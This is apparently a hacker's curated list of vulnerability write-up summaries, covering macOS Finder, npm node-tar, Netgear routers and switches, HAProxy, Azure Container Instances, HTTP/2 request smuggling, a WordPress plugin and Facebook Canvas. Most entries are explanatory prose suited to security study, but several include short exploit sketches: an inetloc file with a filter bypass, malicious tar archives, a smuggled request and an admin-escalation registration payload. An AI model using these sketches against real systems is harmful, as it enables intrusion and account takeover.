Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

macOS Finder RCE - 623

Park Minchan - SSD     Reference → Posted 4 Years Ago
  • inetloc files are shortcuts for internet locations, such as RSS feeds. However, this can also include the file:// URI.
  • When such a file points at an executable on macOS, the file is simply run! The POC is an extremely simple file that just launches the Calculator app on macOS. It should be noted that the POC's file URI has a large number of slashes (/) in the XML file, but only 3 are needed from my personal testing of the bug; I do not know why they would make such a confusing POC. Even when opened as an email attachment, arbitrary programs can be run.
  • The fix from Apple tried restricting the file URI. However, the validation was case-sensitive! This meant that FIle:// could be used in order to bypass the check on newer versions.
  • This is a simple bug that is really easy to exploit. However, I think you would need a way to call a program with specific arguments in order to exploit this to allow for complete compromise. I wonder if the terminal can be called in this way?
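As a sketch of how small the trigger is, the snippet below writes out a .inetloc file in the plist layout these shortcuts use. The Calculator path is illustrative, and the case-mangled FIle:// scheme is there to mirror the patch bypass described above; this is an assumption of the file's shape, not the advisory's exact POC.

```python
# Minimal sketch of a .inetloc payload (assumed plist layout).
# The FIle:// casing illustrates the case-sensitive-filter bypass.
POC = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>FIle:///System/Applications/Calculator.app</string>
</dict>
</plist>
"""

with open("poc.inetloc", "w") as f:
    f.write(POC)
```

On a vulnerable system, simply opening such a file from Finder (or an email attachment) would launch the target.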

5 RCEs in npm for $15,000 - 622

Robert Chen    Reference → Posted 4 Years Ago
  • Package managers are a complicated ecosystem: we are installing code to run on our system, but with most package managers we must explicitly choose to execute that code by calling its functionality. This means the package being installed should not be able to compromise the computer prior to being executed; we need to guarantee that this is the case!
  • The package node-tar promises that any extraction will NOT overwrite files outside the given directory. Since npm install deals in tarballs, finding a bypass would be super interesting!
  • The first vulnerability is exactly this. The tarball extraction validates that an absolute path is not being used, but this check was weak: a single substring comparison that simply stripped one leading '/' off the path. Supplying /// (three slashes) would become // (two slashes), which is still absolute, bypassing the filter. Now we can write a file to any location upon installation!
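The flawed check can be sketched in a few lines of Python. This is a simplification of the idea, not node-tar's actual code: stripping a single leading slash does not make a path relative.

```python
import posixpath

def naive_strip(path):
    # Assumed simplification of the flawed check: strip one leading
    # '/' and treat the result as "no longer absolute".
    if path.startswith("/"):
        path = path[1:]
    return path

evil = "///etc/passwd"
stripped = naive_strip(evil)
print(stripped, posixpath.isabs(stripped))  # //etc/passwd True
```

The stripped path still begins with a slash, so writing to it lands outside the extraction directory.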
  • To patch this vulnerability, some serious validation had to be done. The bulk of the patch used the isAbsolute function to check whether the path was absolute. If we could find a difference between resolve (the executor) and isAbsolute (the parser), we could bypass this check.
  • On Windows, C:/ marks an absolute path. With C:/different/root, the path.resolve function has a weird special case when the second parameter is an absolute path: it just resolves it! Additionally, double-dot (../) resolution only happens between path delimiters; as a result, C:../ is a valid drive-relative path that we can use. This allowed a minimal directory traversal (one directory up). Using a symlinked package, this could be used to do more damage though.
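The bug is in Node's path module, but Python's ntpath exposes the same parser quirk and makes it easy to see: a drive-relative path like C:../ passes an absolute-path check while still carrying a drive letter.

```python
import ntpath

# Drive-relative Windows paths: no root after the drive, so an
# isAbsolute-style check passes, yet the drive letter survives.
p = "C:../outside/evil.txt"
print(ntpath.isabs(p))        # False -> would pass the patched check
print(ntpath.splitdrive(p))   # ('C:', '../outside/evil.txt')
```

This parser/executor mismatch is exactly the gap between isAbsolute and resolve described above.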
  • node-tar handles hardlinks and symbolic links (but NPM does not). However, there is a guarantee that these will not overwrite files outside the current directory, enforced through a directory cache that runs these checks. If we could get a fake entry into the cache, we could pull off the classic symlink and hardlink attack, resulting in arbitrary files being written to the system!
  • The first POC was fairly simple: add a folder, tar this folder, and remove the directory. At this point, the real file system is different from the cached view. By adding a symbolic link with the same name as our folder and extracting the archive, it simply trusts the cache and writes the file through the symbolic link. Damn, that's real bad!
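The archive layout can be sketched with Python's tarfile module. The member order is the trick; the link target is illustrative. A vulnerable extractor that cached "x" as a directory would follow the symlink when writing "x/y".

```python
import io
import tarfile

# Sketch of the cache-desync archive:
#   1. a real directory "x" primes the extractor's directory cache
#   2. a symlink "x" replaces the directory on disk
#   3. "x/y" is then written *through* the symlink
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    d = tarfile.TarInfo("x")
    d.type = tarfile.DIRTYPE
    tar.addfile(d)
    s = tarfile.TarInfo("x")
    s.type = tarfile.SYMTYPE
    s.linkname = "/tmp/target"  # illustrative target
    tar.addfile(s)
    tar.addfile(tarfile.TarInfo("x/y"))  # empty regular file
```

A patched node-tar evicts the cache entry when a symlink is extracted, which is what ultimately killed this bug class.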
  • To patch the original bug, they just removed the entry from the directory cache. To bypass this, Windows-specific implementation code could be used to cause havoc on Unix: the \\ separator is handled on Windows but NOT on Unix. Now the same bug could bypass the filtering functionality because the file system was Unix and not Windows; the same exploit as before works, except that the file name a\\x is used in the cache instead.
  • The NEXT patch added even more defense in depth, with complete path normalization (which seems great). However, macOS does additional normalization of paths, violating the assumptions of the directory cache. Using Unicode craziness on macOS, it is possible to desync the cache from the file system and use the same exploit as before.
  • These bugs were going to be endless... as a result, the project decided to drop the cache entirely if a symlink was discovered, killing the bug class. Good on them!
  • Overall, I enjoyed the content of the article, but I found some of the explanations to be far from clear; this forced me to put a lot of time into the article to figure out what each bug was. Once I understood the bugs, they were awesome though! Parsing and then acting on paths is really hard to do, as different systems have different expectations.

Mama Always Told Me Not to Trust Strangers without Certificates - 621

Adam - Grimm    Reference → Posted 4 Years Ago
  • Lots of Netgear routers include a piece of software called Circle, which adds parental control features to these devices. Because this runs as root, it is a good attack vector.
  • The Circle update daemon polls an HTTP service (note the lack of an 'S' there). This file contains firmware version information, database information and a few other things. If the component is out of date, it will reach out to grab a few files: database.tar.gz, firmware.bin and platforms.bin. The firmware and platform binaries are encrypted then signed blobs of data. However, the database files are not protected in this way. What can be done with this?
  • The update script unpacks the tar.gz file into a directory. In this same directory are the stopcircle, startcircle and several other scripts! Since we control files being extracted into this location, we can add files with these names to our tar.gz. With this, we can overwrite arbitrary scripts to get code execution.
  • To launch this exploit, we need to abuse the fact that the website is HTTP instead of HTTPS. This can be done via DNS spoofing or a classic MitM attack to change the database.tar.gz.
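The malicious database.tar.gz is easy to sketch: it just ships a file named after one of the scripts sitting in the extraction directory (startcircle, per the article). The script body below is a placeholder, not the researchers' actual payload.

```python
import io
import tarfile

# Placeholder payload; on the real device this would run as root
# the next time the overwritten script is invoked.
payload = b"#!/bin/sh\necho attacker-controlled code\n"

buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    info = tarfile.TarInfo("startcircle")  # script name from the article
    info.size = len(payload)
    info.mode = 0o755  # executable
    tar.addfile(info, io.BytesIO(payload))
```

Delivered via DNS spoofing or MitM of the plain-HTTP update check, the update daemon extracts this over the real script.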
  • Overall, this is an interesting exploitation method. Although parts of the binary were signed, not all of them were. Using this one foothold, they leveraged a mistake in the extraction process of the files to own the system. It turns out that handling files is really hard.

Integer Overflow Enables HTTP Smuggling in HAProxy - 620

Ori Hollander & Or Peles - jfrog    Reference → Posted 4 Years Ago
  • HAProxy is an open-source load balancer used for high-traffic websites. Considering it is used by many large companies, it is a good target to find a vulnerability in.
  • With HAProxy, the HTTP request needs to be processed and forwarded on to the next server in the chain. When processing requests, there are two main phases:
    • Initial parsing. The Content-Length is taken out to be used later. It should be noted that the request is translated into its own internal structure to parse.
    • Processing. The internal structure created in the initial parsing is processed.
  • Within HAProxy, there is an integer overflow on the header length. Because the size field is only 8 bits and unsigned, the overflow can be triggered without instantly crashing the application. For instance, a header of size 270 wraps around to a size of 14. Why is this an issue?
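The wrap-around is plain modular arithmetic; a one-line Python sketch shows the truncation:

```python
# The header length lives in an unsigned 8-bit field (per the
# article), so recorded lengths wrap modulo 256.
def u8(n):
    return n & 0xFF  # truncate to an unsigned 8-bit value

print(u8(270))  # 14 -- a 270-byte header is recorded as length 14
```

The parser then believes the header is 14 bytes long, leaving the remaining 256 bytes of our header sitting where the next phase will misinterpret them.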
  • In phase 1, the Content-Length is grabbed and stored, pulling in all of the content for our payload. After the integer overflow occurs in phase 2, the parser's position in the string is confused! Hence, we can change the expected Content-Length header of the request.
  • With the parsing confused, we can make the queue continue parsing at the end of the request with our fake Content-Length header. What does this allow? HTTP smuggling! This allows for an ACL bypass, a WAF bypass, and many other issues. This is an incredibly impactful vulnerability.
  • I really appreciate when memory corruption vulnerabilities are not simply left as "pwn it now". This was not taken to code execution; instead, a small overflow was turned into an actually impactful attack.

Draconian Fear vulnerability - Netgear Switch - 619

gynvael    Reference → Posted 4 Years Ago
  • The authentication flow is convoluted but works. The flow is outlined below:
    1. Obfuscated password is sent to the CGI API.
    2. The CGI creates a file for the auth request that is handled by another process.
    3. The handler of the authentication request authenticates the user. The session is created using the format /tmp/sess/guiAuth_{http}_{clientIP}_{userAgent}.
    4. The browser polls for the result of the authentication attempt. During this polling step, the file mentioned above is accessed with some pre-filled parameters.
  • The vulnerability lies in how much of the session file name we control. The polling step relies on the IP and a numeric (1-5) browser user-agent identifier to determine which user to check. As a result, an attacker on the same IP as the admin can constantly poll this call while the login attempt is occurring to hijack the session. The window is only about 1 second though.
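Because the file name depends only on the transport, the client IP, and that 1-5 user-agent class, a same-IP attacker can enumerate every possible session name. A sketch (the path format comes from the flow above; the IP is illustrative):

```python
# Enumerate all session-file candidates an attacker sharing the
# admin's IP (e.g. behind the same NAT) would poll for.
def session_candidates(transport, client_ip):
    return [f"/tmp/sess/guiAuth_{transport}_{client_ip}_{agent}"
            for agent in range(1, 6)]

for path in session_candidates("http", "192.0.2.10"):
    print(path)
```

Five candidates polled in a tight loop during the admin's one-second login window is what makes the hijack plausible.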
  • This bug would be extremely hard to exploit. However, the author claims that this attack could be achieved from the browser. Hence, it would be possible to constantly run this attack from a malicious website.
  • The author recommends that a cryptographically secure random value be used instead of the user agent and IP address for the file name. As a result, this attack would no longer be possible.
  • Overall, this is a good article (with another auth bypass here via a hardcoded password). I do not consider the IP address to be controllable. But, it is an input that I should consider, even if there is an IP validation check happening.

Seventh Inferno vulnerability - Netgear Switches - 618

gynvael    Reference → Posted 4 Years Ago
  • Switches are networking devices used all over the place. Being able to compromise a switch on a network would allow for traffic sniffing and many other serious attacks. This author chained several odd bugs into a badass pwn.
  • The Web UI logic uses a file to store all of the request information for an authentication request. This information is then read from the file in a different process to authenticate the user. The file contains a username, a password, the name of the result file, and some other information. An example of this file can be seen below:
    ---------------------------
    admin
    mySecretPassword
    /tmp/sess/guiAuth_http_::ffff:someip_5
    ::ffff:someip
    http
    5
    

    ---------------------------
  • The problem starts with the fact that neither the username nor the password is encoded or escaped in any way. This makes newline injection possible to confuse the file parser. The only useful field we can inject into is a file name: the name of the result file. This gives a VERY small file write primitive, where the written file will contain either an ASCII 2 or 3 from the auth request.
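As a sketch (the field layout is simplified from the example file above), a newline smuggled into an attacker-controlled field shifts every later line of the line-oriented file, letting us substitute the result-file path:

```python
# The daemon writes raw fields separated by newlines (simplified);
# a "\n" inside the password inserts a line of our choosing.
username = "admin"
password = "guess\n/var/tmp/sess/attacker_result"  # injected newline
request_file = "\n".join([username, password,
                          "/tmp/sess/guiAuth_http_::ffff:someip_5"])

# A line-oriented parser now reads our path as the result-file field:
lines = request_file.split("\n")
print(lines[2])  # /var/tmp/sess/attacker_result
```

The legitimate result-file line is pushed down, and the write lands at a path we picked.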
  • The sessions are kept inside of the /var/tmp/sess/login_http_ file. For some crazy reason, a session file containing simply 2 is completely valid! This is because of a complete lack of error checking on a multitude of things. Check for errors, kids!
  • This is the craziest part though: the session file needs to end with the current session time. The creation time for these is NOT the Unix timestamp; it is the time since the last reset. But we do not know that value! By crashing the switch, we can force 0 to be a valid number here. The author found that writing 2 to several files, such as /proc/sys/vm/panic_on_oom, would immediately cause a crash; several TCP/IP bugs in the outdated kernel would have worked as well.
  • Now, with the value 2 in the proper file, we have a valid session to call the application with. Damn, that's an amazing find! To add insult to injury, there is command injection in an authenticated command as well, which makes complete compromise trivial at this point.

Cross-Account Container Takeover in Azure Container Instances - 617

Palo Alto Networks    Reference → Posted 4 Years Ago
  • Azure Container Instances (ACI) is containers as a service. ACI runs on both Kubernetes and Service Fabric clusters, and all of the worker nodes are completely separated.
  • Doing recon for a container escape is really complicated because you need to get outside of the container first. By using a known design flaw with Linux containers (WhoC), they were able to see the container runtime. They found that the runC version was extremely old and had many known vulnerabilities.
  • Even though they escaped the container, it was not possible to reach other worker nodes right away, since Azure plans for these types of issues to happen. They scouted around the node for any other issues. Since the Kubernetes version was also old (released in 2017-2018) with known vulnerabilities, they tried some of the existing issues.
  • One of these vulnerabilities (CVE-2018-1002102) appeared to be useful. The API server (master node) sometimes reaches out to the Kubelets, and the vulnerability was that the API server followed redirects to another node's Kubelet. As a result, we could communicate with other nodes (or so they thought); it ended up being patched and was not possible.
  • When making the requests to the middleware API server, they noticed an authorization header with an account token. Kubernetes uses JWTs when doing auth, but since anonymous access was enabled, this was surprising to them.
  • With access to the JWT, they were curious what permissions it gave them. After decoding the JWT, they noticed a very powerful permission: pods/exec. This permission allows for the execution of commands on any pod in the cluster; in fact, this includes the api-server pod!
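Decoding a JWT's claims needs no key, only base64. The token below is a hypothetical stand-in for the bridge's service-account token, and the claim names are illustrative rather than Azure's actual schema:

```python
import base64
import json

def b64url(raw):
    # base64url without padding, as JWTs use
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def jwt_payload(token):
    # Claims are the middle dot-separated segment; restore padding
    # before decoding. No signature verification is needed to *read*.
    b64 = token.split(".")[1]
    b64 += "=" * (-len(b64) % 4)
    return json.loads(base64.urlsafe_b64decode(b64))

# Hypothetical token standing in for the leaked one.
token = ".".join([b64url(b'{"alg":"none"}'),
                  b64url(b'{"sub":"bridge","perm":["pods/exec"]}'),
                  ""])
print(jwt_payload(token))
```

Reading the payload this way is exactly how one would spot a permission like pods/exec in a captured token.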
  • With code execution on the api-server, this was a complete game over. Because we control this, we can communicate with the other nodes in the cluster and compromise them cross-tenant. But, there is more!
  • Between the API-server and the worker nodes, Microsoft added a bridge pod. While testing the communication to the bridge, they noticed an SSRF vulnerability: whenever a command was to be executed on a pod, the bridge grabbed the pod's status.hostIP field, which is configurable by the attacker. The status.hostIP only persists for a few seconds, but it can be constantly updated.
  • After playing around with this issue, they noticed that the IP did not have to be just an IP: it could be a full URL, with the rest of the constructed URL pushed behind a fragment so it did not affect the request at all. By setting the URL to the api-server, they could execute commands once again on this server.
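The fragment trick is easy to demonstrate with a URL parser. Assume the bridge builds its Kubelet URL roughly as f"http://{status.hostIP}:{port}/..." (the exact shape is an assumption); a hostIP ending in '#' swallows the trailing port and path:

```python
from urllib.parse import urlsplit

# "api-server-host" stands in for the real api-server address.
host_ip = "api-server-host/exec#"
url = f"http://{host_ip}:10250/containerLogs"
parts = urlsplit(url)
print(parts.hostname)   # api-server-host
print(parts.fragment)   # :10250/containerLogs (inert)
```

Everything the bridge appended after our value becomes an inert fragment, so the request actually goes to the host and path we chose.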
  • The last bug must have taken an insane amount of blackbox reverse engineering. Both of these findings are quite awesome to see. I particularly enjoyed the race condition with the URL issue though. URLs are extremely hard to handle; I personally think they are the best attack vector for finding vulnerabilities.

HTTP2: The Sequel is Always Worse DEFCON Talk - 616

James Kettle (Albinowax)     Reference → Posted 4 Years Ago
  • HTTP/2 is completely different from HTTP/1.1. HTTP/1.1 is a plaintext protocol where headers are separated by newlines, while HTTP/2 is a binary protocol. In HTTP/2, each frame has a built-in length field, while HTTP/1.1 has a length per request being sent. HTTP/2 has streams that allow for sending data over the same socket instead of multiple connections; data can come back out of order and still be matched up, since there is a stream ID.
  • The first principle of this attack is HTTP/2 downgrades. Although the original connection may be over HTTP/2, it is downgraded to HTTP/1.1 when being proxied to the backend. As a result, all of the security protections of HTTP/2 have vanished: the backend may not agree with what the frontend thinks is a single request because of the transfer-encoding or content-length header, just as in HTTP/1.1 smuggling.
  • The rest of the presentation is mostly case studies on real-world targets. On Netflix, the frontend would read the Content-Length header in the HTTP/2 request and use it when forwarding the request over HTTP/1.1. The problem is that the Content-Length could be invalid, with other data attached to the request. The translation resulted in an unanticipated request being smuggled in and an extra response being produced.
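A sketch of what the downgraded byte stream looks like to the backend. In HTTP/2 the frame length is authoritative, so the frontend forwards the lying Content-Length plus the whole body; an HTTP/1.1 backend obeying Content-Length then sees two requests. The hostnames are illustrative:

```python
# Bytes as seen by the backend after the HTTP/2 -> HTTP/1.1 downgrade.
# Content-Length: 0 means the "body" is parsed as a second request.
downgraded = (
    b"POST /home HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: attacker.example\r\n"
    b"\r\n"
)

# Split at the first blank line, as a Content-Length-honoring
# HTTP/1.1 parser would:
first, rest = downgraded.split(b"\r\n\r\n", 1)
print(first.split(b"\r\n")[0])  # the request the frontend saw
print(rest.split(b"\r\n")[0])   # the smuggled request
```

The smuggled request gets prepended to whatever the next user sends on the reused backend connection.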
  • Exploiting these bugs is complicated in practice since every situation is so unique. To exploit the bugs above, the author started redirecting users to his site, hoping to see sensitive information including authentication tokens. In one case, the victim was checking to see if they were allowed to send the credentials to his server! At this point, they modified their own website to send the Access-Control headers allowing the credentials over.
  • The next example deals with connection-specific information included in the request. In HTTP/2, any request carrying a connection-specific header must be treated as malformed. In the case of AWS ALB and the Incapsula WAF, this was not done: even though the header transfer-encoding: chunked should have been rejected, it was still appended onto the request. The Content-Length is written out, but the backend server prioritizes the transfer-encoding: chunked header, resulting in another desync.
  • In another attack against Firefox, they found a header injection vulnerability by putting the transfer-encoding header inside another header's value with an added newline. When the translation between protocols occurred, there was another desync. Against Jira, this header injection desynced the response queue, resulting in the wrong responses being sent back. There are a plethora of other ways to attack the HTTP/2 downgrade as well.
  • The exploitation path depends on the connection reuse. Depending on how much connection reuse is done, things such as internal header theft, header spoofing, cache poisoning, response queue poisoning and cross-user attacks may be possible. When there is no connection reuse, the attack does not work very well since we cannot affect the other users. How do we know that it is still vulnerable?
  • When one request is smuggled inside another, detection seems like a problem. However, if we truly do smuggle a request, HTTP/1.1 headers will be returned in the response, even though the request should be HTTP/2 only. Sometimes this is blind though, and only the first response is sent back; using a HEAD or OPTIONS request may cause headers such as the Content-Length to be returned, making it obviously vulnerable. What can we do if we cannot attack other users though?
  • Once we have a request tunneling issue, we want to see or use the internal headers. Commonly, internal headers are used for sensitive operations, such as who the user is. By using tunneling, we can bypass rejection of the internal headers and use them anyway. Finding these can be hard, as it may require a bunch of brute forcing.
  • Another option for this attack is to leak internal headers. On BitBucket, the author noticed they could inject newlines into headers. As a result, the frontend and backend disagreed on where the body of the request starts and ends. If the parameter that we are using gets reflected back, the appended internal headers show up in the reflection! Now we have leaked the headers, which may even contain secret information.
  • If the stars truly align, web cache poisoning may be possible with request tunneling as well. Using the poisoning, we can create reflected XSS or hijack pages entirely.
  • The end of the article/talk gives a large list of other potential HTTP/2 smuggling issues:
    • Duplicating the path, method and scheme between different HTTP servers.
    • The :authority pseudo-header replaces the Host header, but servers support both, which can cause issues.
    • The scheme of an HTTP/2 request is meant to be http/https. If this is not verified, we can put a full URL inside of it and confuse how servers build the forwarded request. The author found SSRF using this exact issue.
    • Some servers do not allow newlines into the fields. However, they do allow for colons, which could cause issues.
    • Anything that is an input in HTTP/2 is potentially in danger, especially fields that get converted to HTTP/1.1 but are not in the HTTP/2 specification.
  • What else could there possibly be? Essential knowledge! Lots of servers support HTTP/2 but forget to advertise it; Burp Request Smuggler now has a way to detect this. Additionally, some requests can corrupt each other; be careful when testing this, as you may corrupt your own things.
  • The tooling is sparse right now but is growing:
    • Turbo Intruder has a custom H2 stack written by the author. Some rewrites were done to put things like newlines into places where they should not be.
    • http2smugl is a patched GoLang client.
    • Burp Suite has a repeater and the normal proxy, which can be used for this.
    • YouTube talk and similar research.

Easily Exploitable Critical Vulnerability in ProfilePress Plugin of WordPress - 615

Numan Rajkotiya - SecureLayer    Reference → Posted 4 Years Ago
  • ProfilePress, better known (and more clear) as User Avatar, is installed on 400K sites. During the registration process, users could supply metadata about themselves that was directly added to the user information.
  • This seems fine and dandy for fun customization. However, it has a deadly issue: the metadata was not validated for security threats. By setting metadata for the wp_capabilities of a user, it was possible to set the user's role on the website, such as admin.
  • To make matters worse, this endpoint does not even validate if registration is enabled on the site. Hence, this can be exploited even if the feature is not turned on. Damn!
  • The endpoint takes in an array of user input. By passing in wp_capabilities[administrator]=1 in the request, we have poisoned the metadata of the user registration. Complete game over!
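A sketch of the registration body: the wp_capabilities[administrator] parameter comes from the article, while the other field names are illustrative placeholders for whatever the endpoint actually accepts.

```python
from urllib.parse import urlencode

# Hypothetical registration payload; only the wp_capabilities key is
# taken from the write-up.
data = {
    "user_login": "attacker",
    "user_email": "attacker@example.com",
    "wp_capabilities[administrator]": "1",
}
body = urlencode(data)
print(body)
```

POSTed to the registration endpoint, the array-style key lands in the new user's metadata and grants the administrator role.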
  • This bug requires a good understanding of how WordPress works. I personally may not have found this right away, simply because I would not have thought about the metadata being this important for user creation.

More secure Facebook Canvas: Tale of $126k worth of bugs that lead to Facebook Account Takeovers - 614

Youssef Sammouda    Reference → Posted 4 Years Ago
  • Facebook allows online game owners to host games on apps.facebook.com within an iFrame. Since this is an iFrame, cross-window communication via postMessage must be used, which is hard to do securely!
  • To find these bugs, the author thoroughly audited the client-side code, tracing the inputs/outputs throughout. The author shows the minimized code that they retained in order to make it easier to review.
  • The flow is a little complicated. It works like this:
    1. iFrame sends message to the parent.
    2. The message event dispatcher in XdArbiter passes the data to the handleMessage function.
    3. This is passed to a JSONRPC call, which pops a dialog box showing the user information about the author of the app.
    4. If all checks out, PlatformDialogClient is called to make a POST request to apps.facebook.com/dialog/oauth.
    5. This endpoint returns an access token, which is sent back to the iFrame.
  • The author mentions a few potential items of interest:
    • IFRAME_ORIGIN is used in the redirect_uri parameter of OAuth. Making this go to the wrong location could allow for a classic OAuth attack that steals the access token.
    • Keys and values within the params object. Some of these parameters are attached to the OAuth POST request mentioned above, such as the APP_ID and the IFRAME_ORIGIN.
    • What if we could convince IFRAME_ORIGIN and the APP_ID that we were a different app, such as Instagram? Of course, there is protection in place!
  • The first vulnerability is parameter pollution, with a desync between the frontend verification and the backend understanding. When making the call with PARAM[random, the backend would replace the actual parameter with this value, even though the client side did not! As a result, we have a desync between the frontend's and backend's understanding of the redirect_uri.
  • Using the desync mentioned above, we can set the redirect_uri to be the Instagram login page and have the app ID be Instagram's as well. Now, the OAuth endpoint will return a first party token from Instagram. Parameter pollution is crazy when it works!
  • The second vulnerability is deep in the flow of the application and hits many edge cases. When validating the origin information, there is a special case for when no fragment is sent in the URL; when this happens, a variable named k is used instead. What is k though? Although it is not clear what it is used for, the validation that it is set is flawed, since it trusts the APP_ID that we send with it.
  • By setting k ourselves with the flawed APP_ID check, we can again get a first party token from many apps. Although, this did not work with all applications.
  • The version property in params, passed in the original cross-window message, was not checked for directory traversal or added paths. This bug occurs when the API version, which is user controllable, is added into the URL. As a result, we can manipulate the URL to make GraphQL queries on our behalf, by putting a path into the version value and using a fragment to remove the other parts of the URL. The author chose to add a phone number to the user's account, which could be used for a complete account takeover.
  • Cross-origin communication with complicated authentication schemes is extremely difficult to do. It took this researcher a while to understand the whole flow; once they did, it became a bug farm with fairly niche and crazy attacks. Really good article from Youssef.